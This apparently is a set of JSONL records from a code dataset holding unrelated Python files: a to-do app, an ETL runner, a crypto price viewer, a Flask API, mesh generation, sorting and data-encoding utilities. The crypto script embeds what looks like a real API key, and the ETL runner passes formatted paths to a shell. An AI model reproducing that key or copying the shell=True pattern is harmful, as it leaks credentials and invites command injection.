\"priority\": priority\n }\n\n to_do.append(my_tasks)\n print(to_do)\n\n elif user_input == \"3\":\n\n for index in range(0, len(to_do)):\n result = to_do[index]\n print(f\"{index +1} - {result['title']} - {result['priority']}\")\n \n elif user_input == \"2\":\n\n for index in range(0, len(to_do)):\n result = to_do[index]\n print(f\"{index +1} - {result['title']} - {result['priority']}\")\n \n delete_task = int(input(\"Enter the number of the task you would like to delete: \"))\n \n def task_to_delete():\n del to_do[delete_task -1]\n \n task_to_delete()\n\n user_input = input(\"Press 1 to add a task, press 2 to delete a task, press 3 to view all tasks, and press q to quit! \")","sub_path":"to_do_list.py","file_name":"to_do_list.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"139266153","text":"# !/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\n\nimport os\nimport subprocess\nimport json\n\n\ndef read_data_conf(cfg):\n return json.load(open(cfg, 'r'))\n\n\ndef runtask(key, task_path, date_str):\n command_str = \"cd %s && runtask -d%s \" % (task_path, date_str)\n print(command_str)\n retcode = subprocess.check_call(command_str, shell=True)\n print(key + \"返回码 : \" + str(retcode))\n\n\ndef itemsly():\n date_str = '20180701'\n data_conf = read_data_conf('tm1Task.json')\n for (key, value) in data_conf.items():\n task_path = os.path.join('%s/%s' % (\"/home/q/www/dc-data-etl/etl_task/dwd/tm/task\", value[\"path\"]))\n runtask(key, task_path, date_str)\n\n\nif __name__ == '__main__':\n itemsly()\n","sub_path":"shangrila 部分执行脚本/tm1_task/runTaskByJson.py","file_name":"runTaskByJson.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"481850045","text":"import tkinter as tk\nfrom PIL import ImageTk\nimport urllib.request\nimport webbrowser\nimport json\nroot = tk.Tk()\n\nurl = \"https://api.nomics.com/v1/currencies/ticker?key=9d876aa144dc791bff11cb5b07a01d3d&\" \\\n \"ids=BTC,ETH,XRP&interval=1d,30d&convert=USD\"\n\n\nclass nomics_api:\n\n def crypto_json(self, url):\n return urllib.request.urlopen(url).read()\n\n def conv_object(self):\n obj = json.loads(nomics.crypto_json(url))\n return json.dumps(obj, indent=2)\n\n\nnomics = nomics_api()\n\n\ndef link():\n return webbrowser.open(\"https://cryptowat.ch\")\n\n\nFILENAME = r\"C:\\Users\\HP\\stockimage.jpg\"\nroot.title('CRYPTO_PRICE_IN_REAL_TIME')\nroot.geometry(\"780x439\")\ncanvas = tk.Canvas(root, width=700, height=439)\ncanvas.pack()\ntk_img = ImageTk.PhotoImage(file=FILENAME)\ncanvas.create_image(125, 125, image=tk_img)\nquit_button = tk.Button(root, text=\"Quit\", command=root.quit, bg=\"red\")\nquit_button_window = canvas.create_window(450, 300, anchor='nw', window=quit_button)\n\nweb_link = tk.Button(root, text=\"visit CRYPTO WATCH\", command=link, anchor='w', width=30, bg=\"green\")\nweb_link_window = canvas.create_window(290, 10, anchor='nw', window=web_link)\n\n\ndef live_price():\n st = json.loads(nomics.crypto_json(url))\n\n btc_cap = tk.Label(root, text=\"BTC MARKET-CAP : \" + \"\\r\" + st[0]['market_cap'] + \" USD\")\n canvas.create_window(10, 80, anchor='nw', window=btc_cap)\n\n eth_cap = tk.Label(root, text=\"ETH MARKET-CAP : \" + \"\\r\" + st[1]['market_cap'] + \" USD\")\n canvas.create_window(10, 150, anchor='nw', window=eth_cap)\n\n btc_price = tk.Label(root, text=\"BTC PRICE: \" + \"\\r\" + st[0]['price'] + \" USD\")\n canvas.create_window(400, 80, anchor='nw', window=btc_price)\n\n eth_price = tk.Label(root, text=\"ETH PRICE: \" + \"\\r\" + st[1]['price'] + \" USD\")\n canvas.create_window(400, 150, anchor='nw', window=eth_price)\n\n time_stamp = tk.Label(root, text=\"DATE : \" + st[1]['price_timestamp'])\n canvas.create_window(200, 330, anchor='nw', window=time_stamp)\n root.after(1000, live_price)\n\n\nlive_price()\nroot.mainloop()\n\n\n\n\n\n","sub_path":"CRYPTO.py","file_name":"CRYPTO.py","file_ext":"py","file_size_in_byte":2054,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"418138830","text":"from flask import request\nfrom flask_restplus import Namespace, Resource, fields\n\nfrom rpsls_api.commons import scoreboard_helper, schemas\n\nfrom rpsls_api.models import Scoreboard\nfrom rpsls_api.extensions import db\n\napi = Namespace('scoreboard', description='Scoreboard related operations')\n\n\nreset_scoreboard_fields = api.model('ResetScoreboardFields', {\n 'username': fields.String(required=True)\n})\n\nscoreboard_fields = api.model('ScoreboardFields', {\n 'username': fields.String(required=True),\n 'result': fields.String(required=True, description=\"Result of a play\")\n})\n\n\n@api.route(\"\")\nclass ScoreboardResource(Resource):\n\n @api.expect(scoreboard_fields, validate=True)\n def post(self):\n \"\"\"\n record play result\n \"\"\"\n body = request.get_json()\n username = body.get(\"username\")\n result = body.get(\"result\")\n\n if result == \"win\":\n score = Scoreboard(\n username=username,\n win=1,\n lose=0,\n tie=0\n )\n db.session.add(score)\n elif result == \"lose\":\n score = Scoreboard(\n username=username,\n win=0,\n lose=1,\n tie=0\n )\n db.session.add(score)\n elif result == \"tie\":\n score = Scoreboard(\n username=username,\n win=0,\n lose=0,\n tie=1\n )\n db.session.add(score)\n else:\n return {\"error\": \"Result not valid.\"}, 400 \n\n try:\n db.session.commit()\n return {\"error\": None}\n except Exception as e:\n db.session.rollback()\n return {\"error\": \"Error recording this play. Reason {}\".format(e.args)}, 400\n\n\n@api.route(\"/stats\")\nclass UserStatResource(Resource):\n\n query_parser = api.parser()\n query_parser.add_argument('username', required=True, location='args', type=str)\n\n @api.expect(query_parser, validate=True)\n def get(self, query_parser=query_parser):\n \"\"\"\n returns win/lose/tie stat of a user\n \"\"\"\n args = query_parser.parse_args()\n username = args['username']\n stats = scoreboard_helper.get_user_stats(username)\n if stats:\n return stats\n else:\n return {\n \"win\": 0,\n \"lose\": 0,\n \"tie\": 0\n }\n\n\n@api.route(\"/list\")\nclass ScoreboardListResource(Resource):\n\n query_parser = api.parser()\n query_parser.add_argument('username', required=True, location='args', type=str)\n query_parser.add_argument('limit', required=True, location='args', type=int)\n\n @api.expect(query_parser, validate=True)\n def get(self, query_parser=query_parser):\n \"\"\"\n return most recent results\n \"\"\"\n args = query_parser.parse_args()\n username = args['username']\n limit = args['limit']\n\n scoreboard_query = (\n Scoreboard.query.filter_by(username=username)\n .order_by(Scoreboard.create_time.desc())\n .limit(limit).all()\n )\n\n schema = schemas.ScoreboardSchema(many=True)\n\n return schema.dump(scoreboard_query).data\n\n @api.expect(reset_scoreboard_fields, validate=True)\n def delete(self):\n \"\"\"\n deletes user play history\n \"\"\"\n body = request.get_json()\n username = body.get(\"username\")\n\n Scoreboard.query.filter_by(username=username).delete()\n\n try:\n db.session.commit()\n return {\"error\": None}\n except Exception as e:\n db.session.rollback()\n return {\"error\": \"error resetting scoreboard. Reason {}\".format(e.args)}, 400\n","sub_path":"rpsls_api/api/namespaces/scoreboard.py","file_name":"scoreboard.py","file_ext":"py","file_size_in_byte":3781,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"65010778","text":"#!/Users/dtseidl/anaconda/bin/python\n\nimport sys, os\nimport numpy as np\nimport pickle\n# must build trilinos with shared libs\n# for import to be successful\nsys.path.append(\"/Users/dtseidl/local2/trilinos-seacas/lib\")\nfrom exodus import exodus\n\nnoise_level = 2 # 2% noise \ndata_level = \"dp1\" # dr, dp1, dp2 -- data rich/poor1/poor2\n# dp1 and dp2 have different sparsity patterns\nu_rms = np.loadtxt(\"u_rms.dat\")\na = float(noise_level)/100*u_rms # standard deviation of measurement noise\n# u_rms computed from paraview filter (u = u_y here)\n#np.savetxt(\"noise_std.dat\",np.array([a]))\n#np.savetxt(\"noise_var.dat\",np.array([a**2]))\nnp.random.seed(204)\n\n# load sensor data\nsensor_data = pickle.load( open( \"sensor_data.p\", \"rb\") )\n\nmfile = \"input_mesh_\" + data_level + \"_n\" + str(noise_level) + \".exo\"\nrm_output=True\nif (rm_output):\n os.system(\"rm \" + mfile)\n# mesh parameters\ndim = 2\nLx = 1.0\nLy = 1.0\nNx = 20\nNy = 20\ncoord_names = [\"x\", \"y\"]\nnblocks = 1\nnnode_sets = 0\nnside_sets = 4\nside_set_names = [\"bottom\", \"right\", \"top\", \"left\"]\nnblocks = 1\nstep = 1\nt = 0.0\nblkid = 1\nblk_name = \"eblock-0_0\"\nelem_type = \"QUAD4\"\nnnode_per_elem = 4\nnattr_per_elem = 0\n# derived quantities\ndx = Lx/Nx\ndy = Ly/Ny\nnx = np.linspace(0,Lx,Nx+1)\nny = np.linspace(0,Ly,Ny+1)\nnz = np.zeros(nx.shape)\nnnodes = (Nx+1)*(Ny+1)\nnelem = Nx*Ny\n# measurement noise\nmeas_noise_1 = np.random.normal(0.0,a,nelem)\nmeas_noise_2 = np.random.normal(0.0,a,nelem)\n# optional title\nmtitle=\"mesh\"\n# open new file for writing\nmesh = exodus(mfile, mode='w', array_type=\"numpy\", title=mtitle,\n numDims=dim, numNodes=nnodes, numElems=nelem,\n numBlocks=nblocks, numNodeSets=nnode_sets, numSideSets=nside_sets)\n# time and block info\nmesh.put_time(step,t)\nmesh.put_elem_blk_info(blkid,elem_type,nelem,nnode_per_elem,nattr_per_elem)\nmesh.put_elem_blk_name(blkid,blk_name)\n# coordinates\nmesh.put_coord_names(coord_names)\nnode_map = range(1,nnodes+1)\nmesh.put_node_id_map(node_map)\ncx = np.empty(nnodes)\ncy = np.empty(nnodes)\ncz = np.zeros(nnodes)\nn = 0\nfor ycoor in ny:\n for xcoor in nx:\n cx[n] = xcoor\n cy[n] = ycoor\n n += 1\nmesh.put_coords(cx,cy,cz)\n# connectivity\nconn_array = np.empty(nelem*nnode_per_elem,dtype=int)\nspatial_node_map = np.empty((Ny+1,Nx+1),dtype=int)\nn = 1\nfor ey in range(Ny+1):\n for ex in range(Nx+1):\n spatial_node_map[ey,ex] = n\n n += 1\ncindex = 0\nfor ey in range(Ny):\n for ex in range(Nx):\n econn = [spatial_node_map[ey,ex], spatial_node_map[ey,ex+1],\n spatial_node_map[ey+1,ex+1], spatial_node_map[ey+1,ex]]\n for n in range(nnode_per_elem):\n conn_array[cindex] = econn[n]\n cindex += 1\nmesh.put_elem_connectivity(blkid,conn_array)\n# side sets\nspatial_elem_map = np.empty((Ny,Nx),dtype=int)\ne = 1\nfor ey in range(Ny):\n for ex in range(Nx):\n spatial_elem_map[ey,ex] = e\n e += 1\nbottom_elems = spatial_elem_map[0,:]\nright_elems = spatial_elem_map[:,-1]\ntop_elems = spatial_elem_map[-1,:]\nleft_elems = spatial_elem_map[:,0]\nmesh.put_side_set_params(1,Nx,0)\nmesh.put_side_set_params(2,Ny,0)\nmesh.put_side_set_params(3,Nx,0)\nmesh.put_side_set_params(4,Ny,0)\nmesh.put_side_set(1,bottom_elems,np.ones(bottom_elems.shape,dtype=int))\nmesh.put_side_set(2,right_elems,2*np.ones(right_elems.shape,dtype=int))\nmesh.put_side_set(3,top_elems,3*np.ones(top_elems.shape,dtype=int))\nmesh.put_side_set(4,left_elems,4*np.ones(left_elems.shape,dtype=int))\nmesh.put_side_set_names(side_set_names)\n\n# names of element fields\nenames = [\"numSensors\", \"sensor_1_Loc_x\", \"sensor_1_Loc_y\", \"sensor_1_Val_1\", \"sensor_1_Val_2\"]\nedata = {}\nfullSensors = np.ones((Ny,Nx))\nsparseSensors = np.zeros((Ny,Nx))\n# edit to change sensor placement\nif data_level == \"dr\":\n edata[\"numSensors\"] = fullSensors.flatten()\nelse:\n if data_level == \"dp1\":\n pattern = np.array([2, 5, 8, 11, 14, 17])\n elif data_level == \"dp2\":\n pattern = np.array([1, 5, 9, 13, 17])\n sparseSensors[:,pattern] = 1\n edata[\"numSensors\"] = sparseSensors.flatten()\n \n \nedata[\"sensor_1_Loc_x\"] = sensor_data[\"xCoor\"]\nedata[\"sensor_1_Loc_y\"] = sensor_data[\"yCoor\"]\n# add noise here\nedata[\"sensor_1_Val_1\"] = sensor_data[\"d_x\"] + meas_noise_1\nedata[\"sensor_1_Val_2\"] = sensor_data[\"d_y\"] + meas_noise_2\n\n# add element variables\nelemvars = len(enames)\nmesh.set_element_variable_number(elemvars)\nfor i in range(elemvars):\n ind = i + 1\n mesh.put_element_variable_name(enames[i],ind)\n mesh.put_element_variable_values(blkid,enames[i],step,edata[enames[i]])\n\nmesh.close()\n\n# for Bayesian inversion with Dakota ...\n#if data_level == \"dr\":\n# np.savetxt(\"exp_data_\" + data_level + \"_n\" + str(noise_level), \\\n# np.append(edata[\"sensor_1_Val_2\"], a**2*np.ones(meas_noise.shape)), \\\n# newline=\" \")\n#else:\n# inds = np.nonzero(sparseSensors.flatten())[0]\n# np.savetxt(\"exp_data_\" + data_level + \"_n\" + str(noise_level), \\\n# np.append(edata[\"sensor_1_Val_2\"][inds], a**2*np.ones(inds.size)), \\\n# newline=\" \")\n\n \n\n","sub_path":"regression/le/2d_sparse_simul_inversion/create_mesh_2d.py","file_name":"create_mesh_2d.py","file_ext":"py","file_size_in_byte":4916,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"637454132","text":"import numpy as np\nimport pandas as pd\n\ndef error_rate(l):\n l = l[20:80]\n max_v = l[len(l)-1]\n min_v = l[0]\n diff = (max_v - min_v) / 2\n avg = np.mean(l)\n error_v = diff / avg\n return round(error_v*100,2)\n\n\ndirectory = \"Misure/\"\nmaterials = [\"Legno\",\"Vetro\",\"Plastica\",\"Ferro\",\"Carta\"]\ndistance = [str(i) for i in range(5,45,5)]\ndict = {}\nfor m in materials:\n errorList = []\n for d in distance:\n mList = []\n file = directory + m + \"-\" + d + \".csv\"\n data = pd.read_csv(file) \n mList = list(data['Misura'])\n errorList.append(error_rate(mList))\n dict[m] = errorList\n\ndf = pd.DataFrame(dict,[\"5\",\"10\",\"15\",\"20\",\"25\",\"30\",\"35\",\"40\"])\n\ndf.to_csv(\"ErrorRate.csv\", encoding='utf-8', index=False)\n","sub_path":"ScriptTestMisure/graphics.py","file_name":"graphics.py","file_ext":"py","file_size_in_byte":756,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"413907693","text":"#! /usr/bin/env python\n# -*- coding: iso-8859-15 -*-\n##############################################################################\n# Copyright 2003 & onward LASMEA UMR 6602 CNRS/Univ. Clermont II\n# Copyright 2009 & onward LRI UMR 8623 CNRS/Univ Paris Sud XI\n#\n# Distributed under the Boost Software License, Version 1.0\n# See accompanying file LICENSE.txt or copy at\n# http://www.boost.org/LICENSE_1_0.txt\n##############################################################################\n\n\n\"\"\"update of units syntax : transitionnal\n\"\"\"\n__author__ = \"Lapreste Jean-thierry (lapreste@univ-bpclermont.fr)\"\n__version__ = \"$Revision: 1.0 $\"\n__date__ = \"$Date: 2010 $\"\n__copyright__ = \"\"\" Copyright 2003 & onward LASMEA UMR 6602 CNRS/Univ. Clermont II\n Copyright 2009 & onward LRI UMR 8623 CNRS/Univ Paris Sud XI\"\"\"\n__license__ = \"Boost Software License, Version 1.0\"\n\nimport os\nimport sys\nsys.path.insert(0,os.path.join(os.path.dirname(os.path.realpath(__file__)),'..',\"utils\"))\nsys.path.insert(0,os.path.join(os.path.dirname(os.path.realpath(__file__)),'..',\"nt2_basics\"))\nimport datetime\nimport shutil\nimport re\nimport string\nfrom datetime import datetime\nfrom files_utils import write, exist, read\nfrom nt2_base_infos import Nt2_base_infos\nfrom pprint import PrettyPrinter\nfrom nt2_tb_props import Nt2_tb_props\nfrom nt2_fct_props import Nt2_fct_props\nfrom nt2_fct_internals import Nt2_fct_internals\nfrom modify_base import Modify_base\nsys.path.pop(0)\nsys.path.pop(0)\n\nDispatch_Txt = \"\"\" NT2_REGISTER_DISPATCH(tag::%(name)s%(tpl1)s_, tag::cpu_,\n%(blanks)s %(list_A)s, \n%(blanks)s %(tag_list_A)s\n%(blanks)s )\n\"\"\"\n \nNew_Call = \"\"\" template<%(tpl)sclass Dummy>\n struct call : callable\"\"\" \n\n\nclass Nt2_update_scalar_unit(Nt2_fct_props) :\n def __init__(self, tb_name, fct_name) :\n Nt2_fct_props.__init__(self, tb_name, fct_name)\n\n def duplicate_unit(self) :\n pin = self.get_fct_unit_path('scalar')\n pout = pin+'.old'\n Modify_base.duplicate(pin,pout)\n\n def restore_unit(self) :\n pout = self.get_fct_unit_path('scalar')\n pin = pout+'.old'\n Modify_base.restore(pin,pout)\n\n def modify_unit(self,tryonly='tryonly') :\n \"\"\" text is always modified from old one\"\"\"\n style = self.get_tb_style()\n tb_name = self.get_tb_name()\n fct_name = self.get_fct_name()\n print(\"modifying fct for %s with style %s\"% (self.get_fct_name(),style))\n new = self.get_fct_unit_path('scalar')\n old = new+'.old'\n if not exist(new) :\n print(\"%s does not exist\" % new)\n return\n if not exist(old) : self.duplicate_unit()\n oldtxt = read(old)\n newtxt = self.replacements(oldtxt,'\\t',' ')\n pattern = ('nt2::functors' if style =='sys' else 'nt2::'+tb_name)\n rep = ('nt2::tag' if style =='sys' else pattern+'::tag')\n pattern = pattern+'::'+fct_name+'_'\n rep = rep + '::'+fct_name+'_'\n newtxt = self.replacements(newtxt,pattern,rep)\n \n## newtxt = self.replacements(oldtxt,'\\sNT2_CALL_RETURN_TYPE\\(',' NT2_RETURN_TYPE(')\n if tryonly != 'tryonly' :\n write(new,newtxt,False)\n else :\n print(\"===============\")\n PrettyPrinter().pprint(newtxt)\n print(\"===============\")\n\n def replacements(self, txt, orig, rep) :\n return [ re.sub(orig,rep,s) for s in txt]\n \n\nif __name__ == \"__main__\" :\n nud = Nt2_update_scalar_unit(\"cephes\",\"acos\")\n print(\"ok\")\n nud.modify_unit()#\"vas-y\")\n","sub_path":"scriptpython/py_py/nt2_updating/nt2_update_units.py","file_name":"nt2_update_units.py","file_ext":"py","file_size_in_byte":3864,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"396462835","text":"import madbg\nfrom unittest.mock import Mock\nfrom pytest import raises\n\nfrom madbg.debugger import RemoteIPythonDebugger\n\nfrom .utils import run_in_process, run_script_in_process, JOIN_TIMEOUT, run_client\n\n\ndef set_trace_script(port):\n madbg.set_trace(port=port)\n\n\ndef set_trace_and_expect_var_to_change_script(port) -> bool:\n \"\"\"\n Set two vars to the same value, start the debugger, and return True if one of the vars has changed.\n \"\"\"\n original_value = value_to_change = 0\n madbg.set_trace(port=port)\n return original_value != value_to_change\n\n\ndef test_set_trace(port, start_debugger_with_ctty):\n debugger_future = run_script_in_process(set_trace_and_expect_var_to_change_script, start_debugger_with_ctty, port)\n client_future = run_in_process(run_client, port, b'value_to_change += 1\\nc\\n')\n assert debugger_future.result(JOIN_TIMEOUT)\n client_output = client_future.result(JOIN_TIMEOUT)\n assert b'Closing connection' in client_output\n\n\ndef test_set_trace_and_quit_debugger(port, start_debugger_with_ctty):\n debugger_future = run_script_in_process(set_trace_script, start_debugger_with_ctty, port)\n client_future = run_in_process(run_client, port, b'q\\n')\n debugger_future.result(JOIN_TIMEOUT)\n client_future.result(JOIN_TIMEOUT)\n\n\ndef test_set_trace_with_failing_debugger(port, start_debugger_with_ctty, monkeypatch):\n monkeypatch.setattr(RemoteIPythonDebugger, '__init__', Mock(side_effect=lambda *a, **k: 1 / 0))\n debugger_future = run_script_in_process(set_trace_script, start_debugger_with_ctty, port)\n client_future = run_in_process(run_client, port, b'bla\\n')\n with raises(ZeroDivisionError):\n debugger_future.result(JOIN_TIMEOUT)\n client_output = client_future.result(JOIN_TIMEOUT)\n assert ZeroDivisionError.__name__.encode() in client_output\n","sub_path":"tests/system/test_set_trace.py","file_name":"test_set_trace.py","file_ext":"py","file_size_in_byte":1827,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"84642564","text":"from rest_framework.exceptions import APIException\nfrom rest_framework.views import exception_handler as default_exception_handler\n\n\nclass Conflict(APIException):\n status_code = 409\n default_code = 'conflict'\n default_detail = 'Resource is occupied.'\n\n\ndef exception_handler(exc, context):\n \"\"\"Custom API exception handler which unwraps the exception details from JSON \"detail\" value.\"\"\"\n response = default_exception_handler(exc, context)\n if response is not None:\n response.content = str(exc.detail)\n return response\n","sub_path":"backend/api/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":547,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"258237677","text":"from random import randint\n\n## Implementing Bubble sort. The simplest sorting algorithm.\n\ndef check_sorted(arr):\n temp = arr[0]\n for i in arr:\n if i < temp:\n return False\n temp = i\n return True\n\n\ndef bubble_sort(arr):\n for i in range(len(arr), 0, -1):\n for j in range(i - 1):\n if arr[j] > arr[j + 1]:\n temp = arr[j]\n arr[j] = arr[j + 1]\n arr[j + 1] = temp\n\n\nmylist = []\n\nfor i in range(20):\n mylist.append(randint(1, 100))\n\nprint(\"The sorted flag is {} and list is \\n{},\".format(check_sorted(mylist), mylist))\n\nbubble_sort(mylist)\n\nprint(\"The sorted flag is {} and list is \\n{},\".format(check_sorted(mylist), mylist))\n\n#ok \n","sub_path":"com/ishaan/python/Algo_Sorting/sort_bubble.py","file_name":"sort_bubble.py","file_ext":"py","file_size_in_byte":727,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"509494872","text":"\"\"\"\nDefines all common formatting methods\n\"\"\"\nimport collections as col\n\ndef prepare_tuple(item, var_name=\"\", obj_type=float, div_factor=100):\n \"\"\"\n Cast a tuple to appropriate types.\n\n :param item: tuple\n :param str var_name: variable name\n :param type obj_type: object type cast\n :param float div_factor: value division factor\n :return: correct tuple\n \"\"\"\n if isinstance(item, col.Iterable) and not isinstance(item, str):\n item = tuple(map(lambda t: obj_type(obj_type(t) / div_factor), item))\n elif isinstance(item, float) or isinstance(item, int):\n item = (obj_type(obj_type(item) / div_factor),) * 4\n elif isinstance(item, str):\n item = tuple(map(lambda t: obj_type(obj_type(t) / div_factor),\n item.strip(\"(\").strip(\")\").split(\",\")))\n if len(item) == 1:\n item *= 4\n else:\n raise TypeError(f\"Invalid {var_name if var_name else 'object'} type.\")\n return item\n","sub_path":"misc/preformat.py","file_name":"preformat.py","file_ext":"py","file_size_in_byte":970,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"360045331","text":"# Definition for a binary tree node.\n# class TreeNode(object):\n# def __init__(self, x):\n# self.val = x\n# self.left = None\n# self.right = None\n\nclass Solution(object):\n def revtrav(self,root):\n if not root:return\n root.left,root.right=root.right,root.left\n self.revtrav(root.left)\n self.revtrav(root.right)\n return root\n #def trav(self,root):\n \n def isSymmetric(self, root):\n \"\"\"\n :type root: TreeNode\n :rtype: bool\n \"\"\"\n if not root:return True\n chleft=self.revtrav(root.left)\n def trav(a,b):\n if not a and not b :return True\n if not a or not b:return False\n flag=False\n if a.val==b.val:\n flag=True\n return flag and trav(a.left,b.left) and trav(a.right,b.right)\n return trav(chleft,root.right)\n \n","sub_path":"101.py","file_name":"101.py","file_ext":"py","file_size_in_byte":908,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"153824951","text":"# -*- coding: utf-8 -*-\n\nimport os\nimport json\nimport ast\nfrom amp.config import BaseConfig\nfrom sqlalchemy.sql import null\nfrom flask import Blueprint, render_template, send_from_directory, request, \\\n current_app, flash, redirect, url_for\nfrom flask_login import login_user, current_user, logout_user\nfrom flask_restful import Api, Resource\nfrom flask_api import status\nfrom sqlalchemy.exc import IntegrityError\nfrom werkzeug.exceptions import HTTPException\nfrom werkzeug.utils import secure_filename\nfrom .forms import SelectAssetManagementReport\nfrom werkzeug.wrappers import Response\nfrom amp.routes.user.models import *\n\n\nimport pandas as pd\nimport datetime\n\nportal = Blueprint('portal', __name__, url_prefix='/portal')\n\n\n@portal.route('/quarterly-report-portal/', methods=['POST', 'GET'])\n@portal.route('/quarterly-report-portal/', methods=['POST', 'GET'])\ndef quarterly_report_portal(errors=None):\n # todo: pull in qr data to date\n reports = SelectAssetManagementReport()\n if errors is not None:\n errors = ast.literal_eval(errors)\n if 'no_report' in errors.keys():\n flash('please select report type', 'warning')\n return render_template('portals/quarterly_reports.html', form=reports, errors=None)\n return render_template('portals/quarterly_reports.html', form=reports, errors=errors)\n\n return render_template('portals/quarterly_reports.html', form=reports, errors=errors)\n\n\n@portal.route('/uploader', methods=['GET', 'POST'])\ndef upload_file():\n if request.method == 'POST':\n try:\n file = request.files['file']\n if file:\n filename = secure_filename(file.filename)\n selected_report = request.form['myField']\n file_path = os.path.join(BaseConfig.UPLOAD_FOLDER, filename)\n res = report_handler(selected_report, filename, file_path, file)\n if isinstance(res, dict):\n return redirect(url_for('portal.quarterly_report_portal', errors=res))\n if res == 1:\n flash('upload successful', 'success')\n return redirect(url_for('portal.quarterly_report_portal'))\n else:\n return render_template('portal.quarterly_report_portal')\n except HTTPException:\n #todo: catch\n render_template('portal.quarterly_report_portal')\n return render_template('portal.quarterly_report_portal')\n\n\ndef report_handler(report_id, file_name, file_path, file):\n # todo: check on filename, headers, property names, etc\n if report_id == 'None':\n return {'no_report': None}\n quarter, report = file_name.split('-')\n quarter = quarter.replace(\"_\", \"\")\n report = report.replace(\"_\", \" \").split(\".\")[0].strip().lower()\n # first check quarter\n today = datetime.date.today()\n ldq = get_last_day_of_the_quarter(today).date()\n if report_id == '1':\n if report == 'distribution and valuations summary':\n file.save(file_path)\n df = pd.read_excel(file_path)\n properties = Property.get_report_level_properties()\n property_names_list = [i.property_name for i in properties]\n invalid_properties = [i for i in df['property_name'].values.tolist() if i not in property_names_list]\n if invalid_properties:\n return {'invalid_properties': invalid_properties}\n property_name_pid_map = {i.property_name: i.pid for i in properties}\n df[\"property_id\"] = df['property_name'].map(property_name_pid_map)\n del df['property_name']\n df['date'] = ldq\n df = df.applymap(lambda x: x.strip() if isinstance(x, str) else x)\n df = df.where(pd.notnull(df), null())\n recs = df.to_dict('records')\n db_records = [QuarterlyReportMetrics(**rec) for rec in recs]\n for rec in db_records:\n try:\n db.session.add(rec)\n db.session.commit()\n except:\n db.session.rollback()\n db.session.flush()\n return 1\n elif report == \"\":\n pass\n\n elif report_id == '2':\n # valuations report\n pass\n elif report_id == '3':\n # occupancy report\n pass\n\n\n\ndef get_quarter(date):\n return (date.month - 1) / 3 + 1\n\n\ndef get_prior_quarter(date):\n return (date.month - 1) / 3\n\n\ndef get_first_day_of_the_quarter(date):\n quarter = get_quarter(date)\n return datetime.datetime(date.year, 3 * quarter - 2, 1)\n\n\ndef get_last_day_of_the_quarter(date):\n quarter = get_prior_quarter(date)\n month = 3 * quarter\n remaining = month / 12\n return datetime.datetime(date.year + int(remaining), int(month) % 12 + 1, 1) + datetime.timedelta(days=-1)","sub_path":"amp/routes/portals/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":4835,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"243253910","text":"# coding: utf-8\n\nimport numpy as np\nimport pandas as pd\n\n\nclass TargetEncoder(object):\n \"\"\"\n Target encoding as in the paper by Daniele Micci-Barreca available at:\n https://kaggle2.blob.core.windows.net/forum-message-attachments/225952/7441/high%20cardinality%20categoricals.pdf\n \"\"\"\n\n def __init__(self, smoothing=1, min_samples=1, noise_level=0):\n \"\"\"\n min_samples (int): minimum samples to use category average\n smoothing (int): smoothing effect to balance category average vs prior\n noise_level (int): add jitter to encoded values\n \"\"\"\n self.smoothing = smoothing\n self.min_samples = min_samples\n self.noise_level = noise_level\n\n def _add_noise(self, series):\n return series * (1 + self.noise_level * np.random.randn(len(series)))\n\n def _get_averages(self, series, target):\n temp = pd.concat([series, target], axis=1)\n # Compute target mean\n averages = (temp.groupby(by=series.name)[target.name].\n agg([\"mean\", \"count\"]))\n # Compute smoothing\n smoothing = 1 / (1 + np.exp(-(averages[\"count\"] - self.min_samples) /\n self.smoothing))\n # Apply average function to all target data\n prior = target.mean()\n # The bigger the count the less full_avg is taken into account\n averages[target.name] = (prior * (1 - smoothing) +\n averages[\"mean\"] * smoothing)\n averages.drop([\"mean\", \"count\"], axis=1, inplace=True)\n averages.reset_index().rename(columns={'index': target.name,\n target.name: 'average'})\n return averages\n\n def _apply_averages(self, series, averages, fill_val):\n tmp = (pd.merge(series.to_frame(series.name), averages,\n on=series.name, how='left')['average'].\n rename(series.name + '_mean').fillna(fill_val))\n tmp.index = series.index\n return tmp\n\n def encode(self, train_series=None, test_series=None, target=None):\n \"\"\"\n train_series: training categorical feature as a pd.Series\n test_series: test categorical feature as a pd.Series\n target: target values as a pd.Series\n \"\"\"\n assert len(train_series) == len(target)\n assert train_series.name == test_series.name\n averages = self._get_averages(train_series, target)\n # Apply averages to train and test series\n prior = target.mean()\n ft_train_series = self._apply_averages(train_series, averages, prior)\n ft_test_series = self._apply_averages(test_series, averages, prior)\n return {'train': self._add_noise(ft_train_series),\n 'test': self._add_noise(ft_test_series)}\n","sub_path":"code/utils/target_encoder.py","file_name":"target_encoder.py","file_ext":"py","file_size_in_byte":2784,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"56"} +{"seq_id":"110346416","text":"# -*- coding: utf-8 -*-\nfrom google.appengine.ext import ndb\nfrom ndb_models import Account, CUser, Vesy, Feed\n\n\nclass LatestVesys:\n\tdef __init__(self, sipri):\n\t\tself.sipri = sipri\n\n\n\tdef get_latest_vesys(self):\n\t\t# Весы 